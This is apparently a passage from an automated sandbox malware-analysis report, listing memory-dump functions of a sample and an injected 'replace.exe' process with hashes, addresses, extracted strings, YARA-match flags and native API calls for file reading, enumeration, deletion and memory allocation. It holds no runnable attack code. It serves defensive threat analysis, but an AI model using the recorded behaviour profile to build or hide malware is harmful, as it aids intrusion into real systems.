Opcode Fuzzy Hash: 646f356480f7ffb4290a589871ac47a3c2054fe8109dd4f9f44b8aaf02372d23
Instruction Fuzzy Hash: CF9002A1211140D24900B3589504B0A550597E1301B91C41AE2048560CC5358955A135

Function 018729F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a593a09817d2b7c23761d93fc664ab14b8c7bfec2df8764525a229128223aa80
Instruction ID: 5fbe0e179102fc031b9715f48c948e2e1ad9ad5af803f14c67aef53c7a15edde
Opcode Fuzzy Hash: a593a09817d2b7c23761d93fc664ab14b8c7bfec2df8764525a229128223aa80
Instruction Fuzzy Hash: 83900225221000430505B6581704507104697D6351391C425F2009550CD63189656121

Function 018738D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fd296033253d9de15580be6c72927017cd1ab65bb28df3ed90f1ab9c9e3a8b
Instruction ID: ff6519f7761fed8cc8b62fb1c1aee3f75314cc52fd7063341d684f8f4a473b69
Opcode Fuzzy Hash: a4fd296033253d9de15580be6c72927017cd1ab65bb28df3ed90f1ab9c9e3a8b
Instruction Fuzzy Hash: DB90022125505142D550725C55046165005B7E1301F91C425A1808594DC56589597221

Function 01872B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d97a7872313703aeb6f1cae8a21eeb0f30161e6c5c17233fb1b436fea79dd89
Instruction ID: 5bdf7c62a2445d7be90acccfba74e6ff085247187c4041b4d1bdd574f19359cf
Opcode Fuzzy Hash: 5d97a7872313703aeb6f1cae8a21eeb0f30161e6c5c17233fb1b436fea79dd89
Instruction Fuzzy Hash: 0390023121100882D50072585504B46100597E1301F91C41AA1118654DC625C9557521

Function 01872BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677d03510bf59cabd2e907fac88cfee0d9b083790ae339a651bce9e1f27a2be4
Instruction ID: 2281dd6aaafbeec253b8651ef04cc9864b57b9de7b93b10d7627007cbe1bf1a7
Opcode Fuzzy Hash: 677d03510bf59cabd2e907fac88cfee0d9b083790ae339a651bce9e1f27a2be4
Instruction Fuzzy Hash: 3690022161500442D54072586518706101597D1301F91D415A1018554DC6698B5976A1

Function 01872B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1463ccb888c0e4ca43a078d2ec63a6336fc36218276218443069c8fb27b9beb8
Instruction ID: 2d133e1ed6cb7538f605360fb9b7a13cd63b75eaae965c2fbeb06e2f5f450ca7
Opcode Fuzzy Hash: 1463ccb888c0e4ca43a078d2ec63a6336fc36218276218443069c8fb27b9beb8
Instruction Fuzzy Hash: 3D90023121504882D54072585504A46101597D1305F91C415A1058694DD6358E59B661

Function 01872B10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f804e991c1925602701f36444485bef214494f909baca4872fa91760f8d9fc8
Instruction ID: 30b908b67351c3889273d892aec6444f81f7fd18dc7fa54d090cca6849f46770
Opcode Fuzzy Hash: 8f804e991c1925602701f36444485bef214494f909baca4872fa91760f8d9fc8
Instruction Fuzzy Hash: 7C90023121100842D5807258550464A100597D2301FD1C419A1019654DCA258B5D77A1

Function 01872AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649f45cfbf24f9a1690a7b3af1cf6b1bfee8a19df976310fee80ab3a50e7e49a
Instruction ID: 2cb088073eb8f7a2c617c1b72dd29945698c073e67275c4153c7a6aad6ee7261
Opcode Fuzzy Hash: 649f45cfbf24f9a1690a7b3af1cf6b1bfee8a19df976310fee80ab3a50e7e49a
Instruction Fuzzy Hash: 5C90023121100842D50472585904686100597D1301F91C415A7018655ED67589957131

Function 01872AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007405a689bd851e0df2d4ead63ee23f24d825be5d8b5708130ea3a7cbf39949
Instruction ID: fc710ab9690c5aedca175ab9aea6e942e8c52d4c3a8d0d53d4c93edf63cdf072
Opcode Fuzzy Hash: 007405a689bd851e0df2d4ead63ee23f24d825be5d8b5708130ea3a7cbf39949
Instruction Fuzzy Hash: 3E90023161500842D55072585514746100597D1301F91C415A1018654DC7658B5976A1

Function 01872A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857e7f6205d0a7ba08816ca18ab5bcb5ea53c271a0fe0a7ec3e0ca83d85598d0
Instruction ID: ccad35c0a223679e2aeeaa3ff282d22c66c6aa6c1834f23e3167b495870f5400
Opcode Fuzzy Hash: 857e7f6205d0a7ba08816ca18ab5bcb5ea53c271a0fe0a7ec3e0ca83d85598d0
Instruction Fuzzy Hash: 97900225231000420545B658170450B1445A7D73513D1C419F240A590CC63189696321

Function 01874260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09813cb14de8c77585584811126aeab246cf13ef1dcf2f5bbde1f29d2604a3c2
Instruction ID: 0a149d862cff0bcc19d5127920e57b05279a0a9cb027e753160595eb90d0d14b
Opcode Fuzzy Hash: 09813cb14de8c77585584811126aeab246cf13ef1dcf2f5bbde1f29d2604a3c2
Instruction Fuzzy Hash: 4A900231615400529540725859845465005A7E1301B91C415E1418554CCA248A5A6361

Function 01874570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c264687f361947a6916e37cc67674bc7afd80701967d22ecf2e3c2eaccb7bba6
Instruction ID: 6c4592c6f4acce87234a6cdd4c5e4a0903702ebda08157af3a471df0eaa35210
Opcode Fuzzy Hash: c264687f361947a6916e37cc67674bc7afd80701967d22ecf2e3c2eaccb7bba6
Instruction Fuzzy Hash: 71900261611100824540725859044067005A7E23013D1C519A1548560CC6288959A269

Function 01872B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: f7e2c25b8fa56d222cc8315153db2cd403de7db99614db699d8a9bacc35610dd
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01867550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018A4460
CLIENT(ntdll): Processing section info %ws..., xrefs: 018A4592
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018A4530
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018A454D
ExecuteOptions, xrefs: 018A44AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018A4507
Execute=1, xrefs: 018A451E

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 5be0639632ad09d71c1fbf24805798b2a5f4148867d250b491ffe8801edc9b27
Instruction ID: b5de4530ad3d04a63405945a262bda74bb7d89c96e06878b854fe3877b7d146a
Opcode Fuzzy Hash: 5be0639632ad09d71c1fbf24805798b2a5f4148867d250b491ffe8801edc9b27
Instruction Fuzzy Hash: F251FD316002596AEF219EA9EC99FED77ACEF14308F0804E9E605E7281D770DF45CB91

Function 01839046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 018390B1
@wu, xrefs: 0189245B
@, xrefs: 01839095

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: $$@$@wu
API String ID: 0-503205031
Opcode ID: 359b5e27cd23be2e32ae33e155b54077a41e0b0ee39259c2e6aad24974c90250
Instruction ID: b04f574b93d8768b73ee46f76465c2eb33b1e53e9d06eda6ba9d4a672e097eec
Opcode Fuzzy Hash: 359b5e27cd23be2e32ae33e155b54077a41e0b0ee39259c2e6aad24974c90250
Instruction Fuzzy Hash: B0810B71D002699BDB358B58CC44BEEB6B8AB48714F0441EAEA1AF7250D7705F848FA1

Analysis Process: replace.exePID: 7220, Parent PID: 6744COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	1.5%
Total number of Nodes:	457
Total number of Limit Nodes:	73

Executed Functions

Function 028B9A70 Relevance: 41.7, Strings: 33, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 028B9B4B
?, xrefs: 028B9B0A
|l, xrefs: 028B9C00
#, xrefs: 028B9B5F
wp, xrefs: 028B9B26
Z, xrefs: 028B9C9A
gc, xrefs: 028B9B91
b, xrefs: 028B9DD1
t6, xrefs: 028B9B69
8, xrefs: 028B9D12
Y, xrefs: 028B9D26
M, xrefs: 028B9C86
p, xrefs: 028B9DB3
6&, xrefs: 028B9E1A
}, xrefs: 028B9B1F
>, xrefs: 028B9D95
], xrefs: 028B9AF5
3U, xrefs: 028B9D73
J, xrefs: 028B9CE0
^Dv, xrefs: 028B9F82
m, xrefs: 028B9B03
=#, xrefs: 028B9DFF
'l, xrefs: 028B9E3F
R, xrefs: 028B9B11
va, xrefs: 028BA33C
.(, xrefs: 028B9A94
.', xrefs: 028B9BEC
4, xrefs: 028B9AFC
o, xrefs: 028B9C11
v, xrefs: 028B9D9F
"], xrefs: 028B9AAC
S, xrefs: 028B9DC7
&9, xrefs: 028B9DE4

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID:
String ID: Y$#$"]$&9$'l$.'$.($3U$4$6&$8$=#$>$?$J$M$R$S$Z$]$^Dv$b$gc$m$o$p$t6$v$va$wp$|l$}$(
API String ID: 0-2858690599
Opcode ID: d7f34b4e3624287343f1a2fd8633d3a99fddc064fe4a2c98f8960e584387cc5d
Instruction ID: 44c371a8666b13c41fe09ae17b3ef8dcfb48975331aa704a99d336c2db073693
Opcode Fuzzy Hash: d7f34b4e3624287343f1a2fd8633d3a99fddc064fe4a2c98f8960e584387cc5d
Instruction Fuzzy Hash: 82428BB8905229CBEB69CF44C994BDDBBB1BF45308F2081D9C50DAB381CB755A89CF45

Function 028CC240 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 028CC324
FindNextFileW.KERNELBASE(?,00000010), ref: 028CC35F
FindClose.KERNELBASE(?), ref: 028CC36A

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 259cdc96ac34f817b7b5844ed94b4528db987b409c0d45c28960f68f8e9d1aa8
Instruction ID: 67889a882ef2921ff08eff2e3b8cda19db69e708c7f575d214ca7fce9ace2211
Opcode Fuzzy Hash: 259cdc96ac34f817b7b5844ed94b4528db987b409c0d45c28960f68f8e9d1aa8
Instruction Fuzzy Hash: ED3160799002087BDB21DB64DC85FEF777DAF44704F24459DB90CE7180DB70AA858BA1

Function 028D8D40 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 028D8E3B

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bd61a2807257aa0f5c50326a12e14ff0fb0d078ccc6e74e0982d14f406347d0c
Instruction ID: 8df07d116fc81898890e934c0e94ee6fa014105aa28891368f41c3f60cc3cb5d
Opcode Fuzzy Hash: bd61a2807257aa0f5c50326a12e14ff0fb0d078ccc6e74e0982d14f406347d0c
Instruction Fuzzy Hash: 6E31C7B5A00648AFCB14DF99D880EDFB7B9EF8C314F108119F919A7344D730A9558FA5

Function 028D8EB0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,00000000,00000000,00000000,-00000071,FBDD4F99,028D0F92,?,?), ref: 028D8F93

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f5102684a940c8573633223aabdf0a1588187f081ed1061b168c4d2465405be4
Instruction ID: f4152745d187a368c9c340e5b51737ab8886b0423943e6fde6a141da691e654f
Opcode Fuzzy Hash: f5102684a940c8573633223aabdf0a1588187f081ed1061b168c4d2465405be4
Instruction Fuzzy Hash: 5D31E7B9A00608AFDB14DF98D880EEFB7B9EF88314F108119F918A7344D770A9158FA5

Function 028D91B0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(028C19CE,?,028D7C6F,00000000,00000004,00003000,?,?,?,?,?,028D7C6F,028C19CE,028DB08E,028D7C6F,D44589D0), ref: 028D9275

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 41bb8600e80496f83b9eb333e8e7d554f3749772dea200bf73568002586658be
Instruction ID: f5d0b5e744494434108d9754db9a7625dd09bf18d84940862b229adede8a9b6d
Opcode Fuzzy Hash: 41bb8600e80496f83b9eb333e8e7d554f3749772dea200bf73568002586658be
Instruction Fuzzy Hash: E82119B9A00609AFDB14DF98DC41EEFB7B9EF88710F108119F918A7284D770A9158FA5

Function 028D8FA0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 028D9036

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d54661aa6f305f70407e5c5ad77111407e3edd22d72a02f1630388acd7df78af
Instruction ID: fbaef2ac8b8871d8c94c11b1591fc89ffdf83a0930e2f44b18b3613c466cc835
Opcode Fuzzy Hash: d54661aa6f305f70407e5c5ad77111407e3edd22d72a02f1630388acd7df78af
Instruction Fuzzy Hash: F611A379600604BFD610EBA8DC01FEB736DDF85714F108109F909EB280E77179098BA6

Function 028D9040 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028D9074

Memory Dump Source

Source File: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28b0000_replace.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: bd86089259d6e5875f4503909de52df89b4bed81ab109686b9406468e690c746
Instruction ID: c4dfe02cf98d556fe19ec768b7a597c3a307cdf520de3ca646454c0930398187
Opcode Fuzzy Hash: bd86089259d6e5875f4503909de52df89b4bed81ab109686b9406468e690c746
Instruction Fuzzy Hash: EAE0863A2502087BD220FA5ACC04FD7775EEFC5720F518419FA08E7240CAB179018BF5

Function 031D4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D426A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f9c436f97b125ffb705d9e0c81594b91c706a69e4084d5ae8c3088694cf504a
Instruction ID: f1c34d042709f2437a5a0777625945517c004a68639ab9ea6fe2c7f7c40b5c9c
Opcode Fuzzy Hash: 9f9c436f97b125ffb705d9e0c81594b91c706a69e4084d5ae8c3088694cf504a
Instruction Fuzzy Hash: C090023160580413D540B2584A84946400597E4701B51C415E4415554CCB2589566371

Function 031D4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D457A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad087c5d70fbfd2f04af9522c23927920dde6a928bf86d99a9b63c296e2963a1
Instruction ID: fa2bdb981a0f760b38bfd9639f7b125b96f2715c9236635c3655a352a6671dd0
Opcode Fuzzy Hash: ad087c5d70fbfd2f04af9522c23927920dde6a928bf86d99a9b63c296e2963a1
Instruction Fuzzy Hash: 26900261601504438540B2584A04806600597E5701391C519A4545560CC7298855A279

Function 031D34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D34EA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47fd5de74a92e65255b58db35f19abf561e989e896e456df3218af57041458e6
Instruction ID: f85dacfdd76f364788da4ecea1407dab504667775a883d12047644366cdf086a
Opcode Fuzzy Hash: 47fd5de74a92e65255b58db35f19abf561e989e896e456df3218af57041458e6
Instruction Fuzzy Hash: B290023160550803D500A2584714B06100587D4601F61C815A4415568DC7A6895175B2

Function 031D2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2B1A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 657a66e0495555eacb645ab275a69f93baed3ac549a965f8aa3baf55a46beefb
Instruction ID: f1eeff363f757ad22a301f6c1c826a1aa081bf47efd2cd947ff5756481613c9f
Opcode Fuzzy Hash: 657a66e0495555eacb645ab275a69f93baed3ac549a965f8aa3baf55a46beefb
Instruction Fuzzy Hash: A090023120140C03D580B2584604A4A000587D5701F91C419A4016654DCB268A5977B1

Function 031D2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2B0A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ea3bceb99ace055c461ca2b69638db22125f64aa243f36a2545ccb8765fa6f2
Instruction ID: ce8ca5af9d2daf0da8ec7ddf996406a2b6fc810a426c538c488891d8ee46ca6c
Opcode Fuzzy Hash: 4ea3bceb99ace055c461ca2b69638db22125f64aa243f36a2545ccb8765fa6f2
Instruction Fuzzy Hash: 2790023120544C43D540B2584604E46001587D4705F51C415A4055694DD7368D55B671

Function 031D2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2B9A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45e687e88bd42e2c6c19085d6ffb1d559d31274d5ce1df1a83bece55204633e3
Instruction ID: dc8443c4bc27d477d6db4a331bddfdd142f0f3b0268b40512f6166ce081f9ff0
Opcode Fuzzy Hash: 45e687e88bd42e2c6c19085d6ffb1d559d31274d5ce1df1a83bece55204633e3
Instruction Fuzzy Hash: 9590023120148C03D510A2588604B4A000587D4701F55C815A8415658DC7A688917131

Function 031D2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2B8A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffd3cd41ecbc7b7f0d891282ad4e7af4817ad4d0a951fb2ea4179f6b4e1f9876
Instruction ID: 4df13458f0d80d36a8ff25a38cdf8ff2a45bf1a9b66743a53c6fa48edbfa86b3
Opcode Fuzzy Hash: ffd3cd41ecbc7b7f0d891282ad4e7af4817ad4d0a951fb2ea4179f6b4e1f9876
Instruction Fuzzy Hash: 5C90023120140C43D500A2584604F46000587E4701F51C41AA4115654DC726C8517531

Function 031D2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2BCA

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41ddf1a13ab1f9aa0174367cabe2cad7aeb601d6b17ed9be49ab33f1fe8d2c8c
Instruction ID: f46b78b47c742ff186f87d590d2007770582aeee3c7b08665c0b595075be4736
Opcode Fuzzy Hash: 41ddf1a13ab1f9aa0174367cabe2cad7aeb601d6b17ed9be49ab33f1fe8d2c8c
Instruction Fuzzy Hash: C290023120140803D500A6985608A46000587E4701F51D415A9015555EC77688917131

Function 031D2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031D2A1A

Memory Dump Source

Source File: 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true

Associated: 00000004.00000002.23446010482.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3160000_replace.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b2fa89c877118ccf68d6ec85f897a237098195ae1428f129c47e41596592def
Instruction ID: 15945f5054a6fb9a0b30defeb7d585444f8ffb4530291fa8f622bae5a51b9b99
